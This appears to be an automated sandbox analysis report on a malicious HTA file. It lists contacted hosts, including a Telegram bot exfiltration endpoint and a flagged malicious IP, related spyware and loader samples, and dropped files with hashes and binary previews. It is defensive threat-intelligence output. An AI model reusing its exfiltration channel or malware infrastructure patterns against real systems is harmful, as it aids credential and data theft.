https://reallyfreegeoip.org/xml/8.46.123.189d	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2104403601.00000000025CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.981931540.0000000004F71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	cossess.exe, 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.00000000025B0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
198.12.89.24	unknown	United States	36352	AS-COLOCROSSINGUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1640152
Start date and time:	2025-03-17 01:17:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	niceworkingskillgivenmebest.hta
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winHTA@15/19@2/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
20:18:55	API Interceptor	42x Sleep call for process: powershell.exe modified
20:19:27	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	SfF8tFQ11f.exe	Get hash	malicious	Unknown	Browse	cpvnxker.xyz/headimage.jpg
	Urgent Purchase Order.vbe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/6m32/
	CQDNwLUdY4.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	sY8Sfsplzf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
	gbdXRnNKkm.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	JOB NO. AIQ8478.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	jzqc1V4NqB.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
	CP07E1clp1.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/406r/
	2Stejb80vJ.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/uztg/
	Shipment_Docus_COSCO_20250307_35405649_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
193.122.6.168	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	ienetstatgoodforkissing.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	DON.ps1	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.SpywareX-gen.21876.23851.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment slip.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Notice Letter 2025 03 12 02930920.docs.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Yeni Sat#U0131nalma Sipari#U015fi.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	SOA OF FEB 2025 PT.BINEX.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.247.73
	Ogdu1MivyN.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	FVWbiG8vBc.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	TOP20250252.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_MARQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	132.226.247.73
reallyfreegeoip.org	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	SOA OF FEB 2025 PT.BINEX.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	Ogdu1MivyN.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	FVWbiG8vBc.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	TOP20250252.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION_MARQUOTE312025PDF.scr.exe	Get hash	malicious	MSIL Logger	Browse	104.21.16.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	SOA OF FEB 2025 PT.BINEX.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	FVWbiG8vBc.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	TOP20250252.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	DHL Shipping Details Ref ID 4466331798008765975594-pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	ienetstatgoodforkissing.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	7495 P.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SOA FEB 2025.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	13.03.2025-13.03.2025 shtml.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
AS-COLOCROSSINGUS	verynicegirlgivenmebestwordforgreatnesswithgoodthings.hta	Get hash	malicious	Unknown	Browse	192.3.95.138
	Build.exe	Get hash	malicious	StormKitty	Browse	23.94.126.116
	h2wb5_002.exe	Get hash	malicious	DarkVision Rat	Browse	104.168.28.10
	dBKUxeI.exe	Get hash	malicious	AsyncRAT, DarkVision Rat	Browse	104.168.28.10
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Xmrig	Browse	107.174.192.179
	earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta	Get hash	malicious	Remcos	Browse	172.245.191.88
	goodmanwnatgoodthingsforbesthings.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	192.3.101.146
	Our Order.xls	Get hash	malicious	Unknown	Browse	198.12.89.24
	ienetstatgoodforkissing.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	192.227.228.22
	Proof of Payment and Statement.xls	Get hash	malicious	Unknown	Browse	192.227.228.22
CLOUDFLARENETUS	JITZq92T28.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	12Kp1xbcjv.exe	Get hash	malicious	Unknown	Browse	104.21.32.1
	JITZq92T28.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	172.67.70.233
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	https://apply.atu.ie/_entity/sharepointdocumentlocation/a10f35db-a302-f011-bae2-7c1e524f2423/903e00e6-7542-ee11-bdf3-6045bd8c56d2?file=CONFIDENTIALDoc_Au89994.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	188.114.96.3
	jbJFtxTmyS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	172.67.72.57
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	SOA OF FEB 2025 PT.BINEX.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	iCgb4kAWFh.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	SOA OF FEB 2025 PT.BINEX.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	CloudServices.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	Ogdu1MivyN.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	FVWbiG8vBc.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	104.21.112.1
	shit.exe.bin.exe	Get hash	malicious	Unknown	Browse	104.21.112.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7066925729119925
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqX:2JIB/wUKUKQncEmYRTwh0j
MD5:	C1119D642B819281C600B197B50EB05A
SHA1:	B5718AED95D87CB2FE04AA0E8FF1B1CD3F22A518
SHA-256:	064A98DFB15567BC2289C63CA320DC6803212E83600604098748C69A0BD325E8
SHA-512:	3576CE1A84D168B7F76819A06506F826D4688528C97159FBB2207CA6E84A4F7DEF9F4E1F217DCA7C97224A3BDDB250AAF68EC570710E4B7B7F123A1B12A60E99
Malicious:	false
Reputation:	low
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe34dd6a8, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899626471649448
Encrypted:	false
SSDEEP:	1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
MD5:	08B095C034D77B9E6AF258583B109CC1
SHA1:	3EA71FFC0F11F7F0283E382AB6371D8E1F115975
SHA-256:	65A60006C731CF84645FB64FC149F552A37FBCE64CB80E459B5452CDA2A01492
SHA-512:	D03673BCC19D83AFA843134D6500CDB669FBBA1E718653F7D6E70DCE52FFBCE0BB52411B7B500957BE7CAEBE65298196FDBF6303EA1F17A2BB793532AAD31CDE
Malicious:	false
Reputation:	low
Preview:	.M.... ...............X\...;...{......................0.`.....42...{5......}..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...........................................}...................#.R.....}...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0804645391841291
Encrypted:	false
SSDEEP:	3:f/KYeJC7/yAt/57Dek3JS3kOLXallEqW3l/TjzzQ/t:3KzJIR3tS0jmd8/
MD5:	8E836B782D2B0DB594B4335B33E65CA4
SHA1:	BBF92CF08D2355CE8452C4873C8963B1AB9E4790
SHA-256:	9AA9D7A45764F6C0FCFAE51C28AD7AD594A220A5D4CC98A1E7E026B73673DC80
SHA-512:	442E36846F41D1F6C4B55D2C5CA221D23E60765C61D76D2B9557F79CD582DFD03BF9DA0F6FDCB746CF012EAB99F7BFFA6081031FE348A6E87A9C0E31C930C02D
Malicious:	false
Preview:	...).....................................;...{.......}..42...{5.........42...{5.42...{5...Y.42...{59.................#.R.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	982016
Entropy (8bit):	6.877802594216076
Encrypted:	false
SSDEEP:	24576:Ou6J33O0c+JY5UZ+XC0kGso6FaN+C2p2dfWY:Au0c++OCvkGs9FaN+CO2IY
MD5:	9A772B3531C6426C3DB9CD09AE1B8576
SHA1:	699254A62E9A8CE5D4C9DBCFC080C7291BC1B0E5
SHA-256:	34EE12E5FF7384703F2A7043D0A839C89CB5D918BDD359422561BFA18D66F0A5
SHA-512:	D3401A8A1BBE570B2DF67DEBAEA4AA091FE1904B39671F1716E3D4A79A4C97F5337466BFEDA020824356547671CBFF9B07B8C5C931D8FBB6171B13CEEE20EBF2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L......g.........."..................}............@..........................p......@.....@...@.......@.....................L...\|....p...s.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....s...p...t..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	5.403946642126862
Encrypted:	false
SSDEEP:	24:3K2WSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9t7J0gt/NK3R8UHr8Htq:bWSU4y4RQmFoULF+mZ9tK8NWR8Wz
MD5:	489EF112F19C26C623DB9A648ADA8F8A
SHA1:	76E6210FB302C1724FF2811D06FDE0134FC492B7
SHA-256:	15A9C4B791D230111F1B4DC0FC4C7CF6C44D632E3127E7B4A4832914CFC52183
SHA-512:	340D31CD769F92A2D2AE3C0C72E1D5511CF187EDC9A9EF2E0B079C8209E814A5D03D149A7DD193737555D80AECE9B1B77C9A4BCFDFEF612A4E5083A09D6AA0EF
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...\|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\RES99C2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Mar 17 02:05:09 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1340
Entropy (8bit):	3.998370059861516
Encrypted:	false
SSDEEP:	24:HaK9o0/wSqRL+hZH+wKOLmfWI+ycuZhN6QakSLVPNnqSed:Y04xRkZ9KYm+1ul3a3rqS+
MD5:	9ABBA1392587952EB3940404C1F72EC6
SHA1:	2C64B39AD64E1BD456FB730B078D06A1F56100C6
SHA-256:	C002C3A32AEA730304CB728A3C6899960D18CBF0D7564D6E86D3FE1880989EF0
SHA-512:	B2CFEB6D05B4A11D6C2A6D2FC5481CF9DF44AE2FCE84EBAEF18BEFB79ECF95204421FA09907FBD46F2805B7B68676FDB3D8C35CD6060D9EC202C89F4E1825109
Malicious:	false
Preview:	L...U..g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........X....c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP...............'.Y'..b.%.&i..0p..........7.......C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp.-.<....................a..Microsoft (R) CVTRES.`.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.e.m.0.s.v.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14rr3y03.abs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5brum3qz.wdw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqmmzj0a.5en.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hh5pskgt.yv0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\autAEB2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\cossess.exe
File Type:	data
Category:	dropped
Size (bytes):	64790
Entropy (8bit):	7.91575684536609
Encrypted:	false
SSDEEP:	1536:kjPUWX0gDOxK860kLcex54Z8PuCAyJmmi/Cqg2XVE9q:kjPUWXJ186zx9u5yJspXVr
MD5:	1219C1EAF8570E2974571BDCDD8080B5
SHA1:	D838EF25EA276BE71BBFDDF5E0BFA1CCC7D23352
SHA-256:	A2A22D68B6FCDCD9AFFFB4EA9A919F28C0880AB4450295FCAEA75C4943251891
SHA-512:	45A9BE1EB0645F45A1924148FA0C8079BD887073F079C9B1D1A077DB2F73DF77BCBB9B364C21BD2A9CB43F303428C59A70DB0F9F9013F33E349F32FC28BC83BA
Malicious:	false
Preview:	EA06..n...8.i.>.A..htmv..X.....l.oI.Lf4.Bm6.M.@....x..(....h.....x.T<T.....x(.Lu.5$.R..z.?..b.Y.b. .Xks...I6.Le.8T.=..I.UH...Z..-f......-c%=..@....M&.....X..+4:p..:..d.oi..=.p.b!6.[.%....U...,.[[...4.....1...:.:....3....$@.]..i..0..Sr.P....L.N.<2.....\|W..N..=..Z.6...v.'..' ...0.....JgO.P.....&.Q...............^..&......8..u..KQ.R.-37...........Q.@...Ci3...`....F..T...F....d.0.`........=...u>.....g^.=....U.S..........LS..............S......@.<+..DX.h....0...Q.MBm8..3....Q.Q.X....M.m..i..}t..:.?.re........G..-.-.4.y...30...c..7.p...<....zV.I7..q.Bi..V(3:..Q..).Z.:.g.M.\|i..R.X(...p..k4..b.F.p.4.e&%)..S.mr...P..*]....jU....C..&U...m....4.mT.......C.^.....cN.qf.y...P......g.Pg5....X.U.u:U:E...i.x..x....+<$.z..'.....J.A)4i.j.(..-....A...!..p...\@..1....x....<m.....C..)........iuk..z...^J...C..).....F..i.Yl~mP.L)r[\.G.A..I...i.M.4......c..m....[/.b.U._i....11...t)..4..T..v.B.F.a....O.H..i...h..-3.].sS.D.K..V]..Sg..=fu..U..x..F.HZ}@8L<....

C:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.089278496311745
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAQak7YnqqLVPN5Dlq5J:+RI+ycuZhN6QakSLVPNnqX
MD5:	27BC59278603620D25A426699CD43070
SHA1:	0A05E164F94E0C48E545C3823C9E67B4C678C555
SHA-256:	46FE2F1A0DC7BAE7857E670914DFEA87BB7D2918D46366DACF71256FAA298F17
SHA-512:	30997906C7E12A87D2A1F455C2FED490C1B2EEA07F2099DEE3232AF4CAC6F82CA93C148E8FA5C68A6E777875E9295C5FEC2FF611FB716DF582B86070816AE681
Malicious:	false
